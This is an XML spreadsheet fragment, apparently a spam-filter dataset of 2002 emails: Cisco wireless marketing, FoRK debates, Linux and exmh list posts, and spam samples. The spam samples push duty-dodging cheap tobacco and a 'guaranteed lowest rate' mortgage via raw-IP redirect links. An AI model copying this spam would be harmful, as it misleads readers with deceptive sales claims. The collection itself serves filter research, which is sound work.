 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D620 align=3Dcenter =
 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD height=3D5&gt;&lt;IMG height=3D10=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG228,00=
 .gif"=20
       width=3D200 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D620 align=3Dcenter =
 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR align=3Dleft&gt;
     &lt;TD&gt;&lt;IMG height=3D1=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG223,00=
 .gif"=20
       width=3D610 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D620 align=3Dcenter =
 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=3Dtop align=3Dleft width=3D170 height=3D100&gt;&lt;IMG =
 height=3D9=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG223,00=
 .gif"=20
       width=3D1 NOSEND=3D"1"&gt;&lt;IMG height=3D9=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG228,00=
 .gif"=20
       width=3D169 NOSEND=3D"1"&gt;&lt;IMG height=3D87=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG223,00=
 .gif"=20
       width=3D1 NOSEND=3D"1"&gt;&lt;IMG height=3D87=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG228,00=
 .gif"=20
       width=3D26 NOSEND=3D"1"&gt;&lt;A href=3D"http://cisco.com"&gt;&lt;IMG =
 height=3D87=20
       alt=3D"Cisco Systems, Inc., Empowering the Internet Generation =
 (SM)"=20
       src=3D"http://cisco.com/images/homepage/logo-tagline.gif" =
 width=3D107 border=3D0=20
       name=3Dciscologo NOSEND=3D"1"&gt;&lt;/A&gt;&lt;IMG height=3D87=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG228,00=
 .gif"=20
       width=3D36 NOSEND=3D"1"&gt;&lt;IMG height=3D4=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG223,00=
 .gif"=20
       width=3D1 NOSEND=3D"1"&gt;&lt;IMG height=3D4=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG228,00=
 .gif"=20
       width=3D169 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;!-- PATH IMAGE ACCORDINGLY FOR =
 http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG252,00.gif =
 --&gt;
     &lt;TD vAlign=3Dtop align=3Dright width=3D420&gt;&lt;IMG height=3D100=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG252,00=
 .gif"=20
       width=3D360 name=3Dmasthead NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;!-- PATH IMAGE =
 ACCORDINGLY FOR =
 http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG249,00.gif =
 --&gt;
     &lt;TD vAlign=3Dtop align=3Dright width=3D30 bgColor=3D#007163&gt;&lt;IMG =
 height=3D100=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG249,00=
 .gif"=20
       width=3D30 name=3Dtopwedge =
 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D620 align=3Dcenter =
 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;&lt;!-- PATH IMAGE ACCORDINGLY FOR =
 http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG250,00.gif =
 --&gt;
     &lt;TD vAlign=3Dtop align=3Dleft width=3D30=20
     =
 background=3Dhttp://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG=
 250,00.gif=20
     bgColor=3D#007163&gt;&lt;IMG height=3D55=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG223,00=
 .gif"=20
       width=3D1 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;!-- PATH IMAGE ACCORDINGLY FOR =
 http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG250,00.gif =
 --&gt;
     &lt;TD align=3Dmiddle width=3D560=20
     =
 background=3Dhttp://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG=
 250,00.gif=20
     bgColor=3D#007163&gt;&amp;nbsp;&lt;/TD&gt;&lt;!-- PATH IMAGE ACCORDINGLY FOR =
 http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG253,00.gif =
 --&gt;
     &lt;TD vAlign=3Dtop align=3Dright width=3D30=20
     =
 background=3Dhttp://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG=
 253,00.gif=20
     bgColor=3D#007163&gt;&lt;IMG height=3D55=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG223,00=
 .gif"=20
       width=3D1 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D620 align=3Dcenter =
 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=3Dtop align=3Dleft width=3D30=20
     =
 background=3Dhttp://cisco.com/asiapac/images/email/email-templates/grid/l=
 ine-leftmargin.gif&gt;&lt;IMG=20
       height=3D55=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG223,00=
 .gif"=20
       width=3D1 NOSEND=3D"1"&gt;&lt;/TD&gt;
     &lt;TD width=3D560&gt;
       &lt;P align=3Dcenter&gt;&lt;!-- END TEMPLATE HEADER --&gt;&lt;BR&gt;&lt;FONT=20
       face=3D"Arial, Helvetica, sans-serif" size=3D5&gt;Cisco Aironet 1200 =
 Series -=20
       Absolute freedom, maximum security.&lt;/FONT&gt;=20
       &lt;P&gt;&lt;FONT face=3DArial color=3D#000000 size=3D2&gt;Dear Mr. =
 Winder&lt;/FONT&gt;&lt;/P&gt;
       &lt;TABLE cellPadding=3D0 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;&lt;!-- PATH IMAGE ACCORDINGLY FOR =
 http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG247,00.gif =
 --&gt;
           &lt;TD width=3D185&gt;&lt;IMG height=3D114 alt=3D"802.11a and 802.11g =
 ready"=20
             =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG247,00=
 .gif"=20
             width=3D182 NOSEND=3D"1"&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face=3DArial color=3D#000000 size=3D2&gt;See how you =
 can have the=20
             highest level of security and mobility with our free CD-ROM =
 on the=20
             Cisco Aironet 1200 Series of Wireless LAN (WLAN)=20
         solutions.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;FONT face=3DArial color=3D#000000 size=3D2&gt;The modular, =
 dual-band design=20
       supports either 2.4 GHz or 5 GHz wireless frequencies, or both=20
       simultaneously.&amp;nbsp; It integrates easily with existing wired =
 networks=20
       and is hardware and software upgradeable.&amp;nbsp; This preserves =
 existing=20
       investments, so you will be able to advance into the future with =
 IEEE=20
       802.11a and 802.11g standards without having to replace your =
 entire WLAN=20
       infrastructure.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face=3DArial color=3D#000000 size=3D2&gt;Rest assured, the =
 Cisco Aironet=20
       1200 Series is as secure as a wired network.&amp;nbsp; Corporate data =
 is=20
       protected by the award-winning Cisco Wireless Security =
 Suite.&amp;nbsp; It's=20
       scalable, centrally managed 802.1x architecture provides both =
 secure=20
       authentication as well as data transmission through per-user, per =
 session=20
       generation and distribution of 128-bit encryption keys.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face=3DArial color=3D#000000 size=3D2&gt;&lt;A=20
       =
 href=3D"http://cisco3.cisco.com.au:8080/Click?q=3D6b-8gbZIHE-wAd2g5EC0yaN=
 http://cisco.com.au/aironet/au17"&gt;Click=20
       here&lt;/A&gt; for your free CD-ROM or to request a Cisco representative =
 contact=20
       you.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face=3DArial color=3D#000000 size=3D2&gt;&lt;B&gt;Cisco Aironet =
 1200 Series WLAN=20
       solution - Maximum security, absolute freedom.&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face=3DArial color=3D#000000 size=3D2&gt;Yours =
 Sincerely,&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face=3DArial color=3D#000000 size=3D2&gt;Tony =
 Wright&lt;BR&gt;Regional Manager -=20
       Marketing&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;BR&gt;&lt;!-- START TEMPLATE FOOTER --&gt;&lt;/P&gt;&lt;/TD&gt;&lt;!-- PATH IMAGE =
 ACCORDINGLY FOR =
 http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG253,00.gif =
 --&gt;
     &lt;TD width=3D30=20
     =
 background=3Dhttp://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG=
 253,00.gif=20
     bgColor=3D#007163&gt;&lt;IMG height=3D1=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG223,00=
 .gif"=20
       width=3D1 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D620 align=3Dcenter =
 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG height=3D1=20
       =
 src=3D"http://www.cisco.com.au/com_vps_gtc/cda/display/image/0,,IMG223,00=
 .gif"=20
       width=3D620 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;TABLE height=3D40 cellSpacing=3D0 cellPadding=3D0 width=3D620 =
 align=3Dcenter border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR align=3Dmiddle bgColor=3D#003031&gt;
     &lt;TD height=3D50&gt;
       &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D560 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR align=3Dmiddle&gt;&lt;!-- PATH URL ACCORDINGLY FOR UNSUBSCRIBE =
 INFORMATION --&gt;
           &lt;TD&gt;&lt;A href=3D"[UnsubscribeURL]"&gt;&lt;FONT=20
             face=3D"Arial, Helvetica, sans-serif" color=3D#ffff00=20
             size=3D1&gt;Unsubscribe&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT=20
             face=3D"Arial, Helvetica, sans-serif" color=3D#ffffff =
 size=3D1&gt;If you do=20
             not wish to receive further emails about the Cisco Aironet =
 1200=20
             Series, please &lt;/FONT&gt;&lt;A=20
             =
 href=3D"http://cisco3.cisco.com.au:8080/Click?q=3D80-KTOvQQ00ie-9F0EsaDvX=
 https://cisco.com.au/au_com_cisco/login/1,1516,USE1,00.html"&gt;&lt;FONT=20
             face=3D"Arial, Helvetica, sans-serif" color=3D#ffffff =
 size=3D1&gt;click=20
             here&lt;/FONT&gt;&lt;/A&gt; &lt;FONT face=3D"Arial, Helvetica, sans-serif"=20
             color=3D#ffffff size=3D1&gt;to=20
 unsubscribe.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR align=3Dmiddle&gt;
     &lt;TD height=3D20&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D1&gt;&lt;BR&gt;All=20
       contents are Copyright (c) 1992--2002 Cisco Systems, Inc. All =
 rights=20
       reserved.&lt;/FONT&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"=20
       size=3D1&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;!-- END =
 TEMPLATE FOOTER --&gt;&lt;IMG=20
 height=3D1 =
 src=3D"http://cisco3.cisco.com.au:8080/Click?q=3D95-Xd0r-zdzmef39PEq1yrx"=
 =20
 width=3D1 NOSEND=3D"1"&gt; &lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0018_01C265A6.5F5B4A30--
 To unsubscribe: send mail to majordomo@wireless.org.au
 with "unsubscribe melbwireless" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">
 me:
 &gt; &gt;Spam is *the* tool for dissident news, since the fact that it's unsolicited 
 &gt; &gt;means that recipients can't be blamed for being on a mailing list.
 &gt; 
 Russell Turpin:
 &gt; That depends on how the list is collected, or
 &gt; even on what the senders say about how the list
 &gt; is collected. Better to just put it on a website,
 &gt; and that way it can be surfed anonymously. AND
 &gt; it doesn't clutter my inbox.
 It doesn't work that way.  A website is opt-in, spam is no-opt.  If you
 visit a samizdat site you can get in trouble.  If you get samizdat spam,
 the worst that can be said is that you might have read it.  And as long as
 the mailers send to individuals who clearly didn't opt-in, like party
 officials, then other recipients can't get in trouble for requesting the
 mail.  
 Plus, it's much harder to block spam than web sites.
 But this shouldn't come as a surprize.  Spam is speech.  It may be sleazy, 
 but so what.
 - Lucas
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I don't understand.  How does sorting one folder add messages to
 &gt; other folders?  What do you use to sort?
 &gt; 
 Sorry I wasn't clear. I am transferring messages from my inbox to other folders 
 and since I am doing it from most recent to oldest, they appear in those 
 folders in the wrong order and need re-sorting.
 --
 rick
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">cdale is a double chocolate chip macadamia to my vanilla wafer.  wait, maybe
 i'm a ginger snap.
 &lt;cough&gt;
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 Russell Turpin
 Sent: Saturday, September 07, 2002 11:06 AM
 To: fork@spamassassin.taint.org
 Subject: Re: Selling Wedded Bliss (was Re: Ouch...)
 Robert Harley:
 &gt;It is perfectly obvious that (heterosexual) promiscuity is exactly,
 &gt;precisely identical between males and females.
 Yeah, assuming approximately equal populations.
 But that obscures the different modes of
 promiscuity. Both the person who gives sex for
 money or power or companionship and the person
 who uses money and power and companionship to
 get sex are promiscuous, in the broadest sense
 of the word. But their motives and behavior are
 quite different.
 Langur monkeys were the example in the cited
 article. "Dominant males .. kill babies that
 are not their own." "The dominant male monkey
 .. seeks to defend his harem of females." But
 cozying up to the current dominant male isn't
 the best strategy for female langurs, because
 "dominant males are dethroned by rivals every
 27 months or so." "By mating with as many
 extra-group males as possible, female langurs
 ensure their offspring against infanticide,"
 by the male who is likely next to rule the
 roost.
 Maybe it's just me, but that doesn't paint a
 picture of carefree females engaged in joyously
 promiscuous couplings. The dom cab driver who
 is taking her two boy toys to New Orleans is a
 better picture of that. ;-)
 _________________________________________________________________
 Chat with friends online, try MSN Messenger: http://messenger.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; So Eugen, how many of your homo friends have -had- 3k lovers?
 Just one. Not everybody does that. Most of them are now dead, anyway.
 &gt; Do you know anyone, outside of meybee Wilt Chamberlin and a few of the
 &gt; gang-bang porn queens who -have- had even 1.5k lovers?
 Yes. Notice that I've specifically excluded sex industry. That be 
 cheating.
 &gt; Eegads, if you're hypothesizing numbers like -that- Eugen, you at
 &gt; least owe it to FoRK to back that shit up.
 Ain't done no hypothesizing. Anecdotal evidence'R'Us. Couldn't you just
 Google, or something?
 &gt; Otherwise we're liable to assume rampant unfounded homophobia and that
 &gt; would just be a lose.
 Yeah, I'm a gay Jew Nazi Muslim who's also a lead character on Kaz's
 underworld. Can we go on with the programme now?
 &gt; Just a quick assumption here.   I'm not a math geek or anything, but
 &gt; assuming 1 lover every day, that would be like at least one lover
 &gt; everyday for 8 years and some change.   I don't know about you, but
 &gt; very very few of us are -that- lucky (or even close to that lucky)
 Which was my point. Gurls don't do hyperpromiscuity as a life style. It's
 interesting that you're launching into a diatribe, and threaten using
 instant argument (just add hominem) instead of assuming I might be not
 just pulling this whole thing out my nether orifice.
 &gt; and after awhile, even the sexaholics get bored and have to mingle
 &gt; something new into their weekends.   You really are assumiing that the
 &gt; homosexual population is a) that large in a given area (The meccas
 You ever been to San Francisco?
 &gt; might qualify, but try finding that kind of homosexual population in
 &gt; say, Tulsa, Oklahoma or Manchester, NH (Tho Manchester does have quite
 Yeah, I think it could be also difficult finding a gay bathhouse in Thule,
 Greenland. Or parts of central Africa. To think of it, both Oort and 
 Kuiper belts are utterly devoid of gay people as well. Isn't this 
 remarkable?
 &gt; a few nifty gaybars, but thats a different story)  b) that bored/sex
 &gt; obsessed/recreationally free to pursue sex that often, with that many
 &gt; partners or that they'd even WANT that many partners.
 This doesn't happen because it couldn't happen. No one would want to. 
 Because you feel that way. Correct?
 &gt; Qualify yourself, or at least lower your outrageous numbers.
 I didn't expect so much reflexive knee-jerking on this list.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Haunted Mansion movie inches forward
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85497407
 Date: Not supplied
 Disney's put up a little brochureware site about its forthcoming (and very 
 exciting!) film based on the Haunted Mansion ride, a followup to the Country 
 Bears movie (I may be the only adult in the world who enjoyed that one). All 
 that's there now is a downlaodable poster, which is pretty keen, except for 
 this supercillious bit of legal crapola you have to click through to get at it. 
     [IMG: http://www.craphound.com/images/hmsign.jpg] Disney Pictures hereby 
     grants you a limited, nonexclusive, nontransferable, one-year royalty free 
     license to use and display the Images on your site in accordance with the 
     terms below. Nothing herein by implication or otherwise, shall grant you 
     any rights other than as explicitly set forth below. 
     You shall receive HTML code and GIF file (the "Files") from Disney Pictures 
     to incorporate the Images into your site. You agree not to modify the Files 
     in any way. Acceptance and use of the Files indicates acceptance of these 
     terms of use. If you do not accept these terms of use, you must not use or 
     display the Files. This license will commence when you receive the Files 
     and will terminate automatically, one year later, or immediately upon any 
     violation of these terms of use. Also, we reserve the right to terminate 
     this license at any time, in our sole discretion, upon notice to you.  
 Link[1] Discuss[2] (_Thanks, Amanda[3]!_)
 [1] http://disney.go.com/disneypictures/hauntedmansion/index.html
 [2] http://www.quicktopic.com/boing/H/rbEFbqvNpUSV
 [3] http://monkeygirl.blogspot.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Low Price Tobacco
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam
 If you are fed up of being 'ripped off' by the British government every time you buy your tobacco, then you should visit our website, where you can now buy 4 cartons of cigarettes, or 40 pouches of rolling tobacco from as little as 170 Euros (approx 105 pounds), inclusive of delivery by registered air mail from our office in Spain.  
 Why pay more???
 Visit our website at
 http://www.cheapsmoking.com/?ID=2
 Best regards
 Sales Department
 Cheap Smoking
 Spain
 xay1992391y
</t>
  </si>
  <si>
    <t xml:space="preserve">
 So are PNGs still kosh?
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Could be your last chance for savings
</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity is knocking. Why?
 Because mortgage rates are rising.
 As a National Lender, not a broker, we can
 guarantee you the lowest possible rate on your
 home loan.
 Rates may well never be this low again. This is
 your chance to secure a better future. You could
 literally save enough money to buy that new car
 you've been wanting or to take that special
 vacation. Why pay more than you have to pay?
 We can guarantee you the best rate and the best
 deal possible for you. But only if you act now.
 This is a free service. No fees of any kind.
 You can easily determine if we can help you in
 just a few short minutes. We only provide
 information in terms so simple that anyone can
 understand them. We promise that you won't need
 an attorney to see the savings.
 We offer both first and second home loans and we
 will be happy to show you why your current loan
 is the best for you. 0r why you should replace
 it.
 Once again, there's no risk for you. None at all.
 Take two minutes and use the link(s) below that
 works for you. Let us show you how to get more
 for yourself and your family. Don't let
 opportunity pass you by. Take action now.
 &lt;a href="http://209.50.252.161/tx.php?sne&amp;211.167.74.101/mortg/"&gt;Click_Here&lt;/a&gt;
 http://209.50.252.161/tx.php?sne&amp;211.167.74.101/mortg/
 Sincerely,
 Chalres M. Gillette
 MortCorp, LLC
 dvytewxlruaiywvjsnwrnanqxgvwtadjlvnrwjynmnhnchcgzlzangopfytyrnrzucxydlatjcmthfdpskzvzrggvlfrholkywmzqngwqgwtmpzxbpxfcrqcw
 __________________________________________________________________
 Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/
 Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Too funny
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 28 August 2002 16:45 CET Steve Thomas wrote:
 &gt; | 0 hits here. :(
 &gt;
 &gt; I also get a lot of them. I think they're using the domain registry
 &gt; database to pull their victims' addresses.
 They are crawling through the pages and send their "offers" to all addresses 
 they find. Theo won't every receive any offers as he doesn't publish his 
 address there ;-)
 Malte
 -- 
 -- Coding is art.
 --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</si>
  <si>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[ILUG] VPN implementation
</t>
  </si>
  <si>
    <t xml:space="preserve">I need to setup a VPN between a few sites. From what I've read, the the
 choices come down (on the Linux side) to IPsec (using FreeSWAN) or CIPE.
 It seems that FreeSWAN is 'better', being an implementation of IPsec which
 is a standard. However, CIPE does the job as well for Linux clients and is
 somewhat simpler to setup. 
 The problem is that it's not a pure Linux situation - a couple of the sites
 run OS-X. I'm pretty sure that I'll be able to find an implementation of
 IPsec for OS-X, but I think CIPE is Linux only.
 So, the question is for those of you have have implemented BOTH - is there a
 significant difference in setup time and hassle between CIPE and FreeSWAN ?
 If CIPE is going to be much easier than dealing with FreeSWAN (and whatever
 on the OS-X sites) then I'll simply get a Linux box for each of the remote
 sites - with the low price of hardware, it doesn't take much more complexity
 in software to make buying hardware to use simpler software economic.
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Julian wrote :
 &gt; I would appreciate it if you could get Gabber packages for Red Hat 8. I 
 &gt; will be making a new release soon, but even in the meantime, 0.8.7 
 &gt; packages would be ok.
 &gt; 
 &gt; I know that in the beta, red hat was using a modified version of 
 &gt; gnome-libs which is incompatible with the latest gnomemm. If this is 
 &gt; still the case in 8, I can send you a patch which makes gnomemm work 
 &gt; again...
 I'm facing another problem right now. It looks like libsigc++ is no longer
 included in the distribution, and gtkmm won't compile without it :-/
 I guess I'll have to repackage it myself for 8.0 (assuming it's possible).
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.28 0.15 0.10
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Apple, Kmail, Adaptive Rules
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;How would forgeries (e.g. viruses) be detected?  Would there be an
 &gt;"oops-I-didn't-mean-to-submit-that" option somehow?
 Real viruses are filtered before they reach any mailbox for delivery.
 Tose two addresses could be accessible only for internal mail.
 And as a user is using this mechanism to build his own database of
 spam/non-spam, that's his problem is he sumbit something wrong.
 BTW, same forgery or wrong submission problems would exist if each
 user had his own set of 2 addresses.
 Olivier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</si>
  <si>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
 --sm4nu43k4a2Rpi4c
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 cmeclax po'u le cmevi'u ke'umri &lt;cmeclax@gmx.co.uk&gt; [2002-08-02 19:19:55 -0=
 400]:
 &gt; I added code to my procmailrc (on the other account) so that anything tha=
 t=20
 &gt; comes on Bugtraq and is in Razor is revoked. Bugtraq is moderated, so spa=
 m=20
 &gt; doesn't get through it. The recipe revoked a message about an hour after =
 I=20
 &gt; added it.
 The problem with automatic revoke is the same as with automatic
 report.  If spammers spoof a From: Bugtraq address then their spam is
 automatically revoked by you.
 Bob
 --sm4nu43k4a2Rpi4c
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9S2NK0pRcO8E2ULYRAml8AJ95XkpwlAeD+ADm+35642dBeI6rKQCffEoJ
 8HDuR9lyCStzdXzccNpTQhs=
 =fUbp
 -----END PGP SIGNATURE-----
 --sm4nu43k4a2Rpi4c--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: [OT] MacOSX mailing list?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Sorry for the OT. Just wondering if anybody knows of a similar type mailing
 &gt;list specifically dealing with MacOSX?  (which, FYI is a version of BSD)
 &gt;Sln,
 &gt;Tim
 Hi Tim,
 It isn't a "version" of anything except NeXTSTEP, with a Mac hackjob.
 It has a bastardised, but functional BSD -layer- which sit's atop Mach and
 uses case insensitive HFS+ but it isn't really a BSD.
 (Here's a neat trick, touch "Makefile" and "makefile", notice the lack of
 error message but the absence of "makefile", and don't bother formatting for
 UFS. The Apple UFS implementation performs like a dog, was frozen in 97,
 implemented badly and has not been updated since. HFS+ get's tweaked every
 now and then, but enough screaming has them looking at shoving UFS2 in there
 somewhere down the road. )
 Then there's the holdover NeXT inherent weirdness, such as multiple versions
 of common Unix files, but none of them do anything, and all changes you
 would usually append to them have to go through NetInfo Manager.
 All in all, I find it to be a functional, if not overly quirky desktop
 environment.
 As for your initial question,
 http://www.omnigroup.com/developer/mailinglists/
 Regards,
 Mark.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: How to add service port ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Yen wrote :
 &gt; How do I install / add an additional service port to the system which
 &gt; can be access via Microsoft ODBC driver?
 I honestly have no idea, and this is probably not the best list to expect
 an answer as it is supposed to discuss rpm packages/packaging matters.
 If you're using Red Hat Linux 7.3, you should try this list :
 https://listman.redhat.com/mailman/listinfo/valhalla-list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</si>
  <si>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
 &gt;&gt;&gt;&gt;&gt; On Wed, 2 Oct 2002, "Chris" == Chris Garrigues wrote:
   Chris&gt; I'm not sure I'll get to it any time soon.
 Well, you have a pretty good idea of when I might get to it (the 
 phrase hell freezes over comes to mind)... so whenever you can 
 will certainly be fine.
 Thanks for considering it.  In the meantime I've set the 
 "minimum entry lines" to 1.  It certainly isn't going to make me 
 go back to the old version.
 --Hal
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: Mutt + Outbox
</t>
  </si>
  <si>
    <t xml:space="preserve">saw this on mutt users.  might be a handy trick for those of with
 hyperactive archiving genes...  :)
 this might work better in this long run though:
    set record='~/Mail/outbox-`date "+%Y-%m"`'
 On Sat, Jul 27, 2002 at 07:08:57PM +0200, Rocco Rutte wrote:
 &gt; Hi,
 &gt; 
 &gt; * Dean Richard Benson [02-07-27 19:05:49 +0200] wrote:
 &gt; 
 &gt; [...]
 &gt; &gt; So in my mutt config file I have this:
 &gt; &gt; set record=Mail/outbox
 &gt; 
 &gt; &gt; ..that works a treat, except that its starting to grow a
 &gt; &gt; little (after 4 months), and I think maybe the ability to
 &gt; &gt; have an outbox folder and then for the above command to
 &gt; &gt; auto-assign to the correct month?
 &gt; 
 &gt; What about:
 &gt; 
 &gt;   set record='~/Mail/outbox-`date "+%m"`'
 &gt; 
 &gt; You could also leave it as it currently is and use the
 &gt; &lt;limit&gt; function to view only mails within a specific 
 &gt; date range.
 &gt; 
 &gt;    bye, Rocco
 &gt;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</si>
  <si>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On Sat, Oct 05, 2002 at 06:06:14PM +0100, Padraig Brady mentioned:
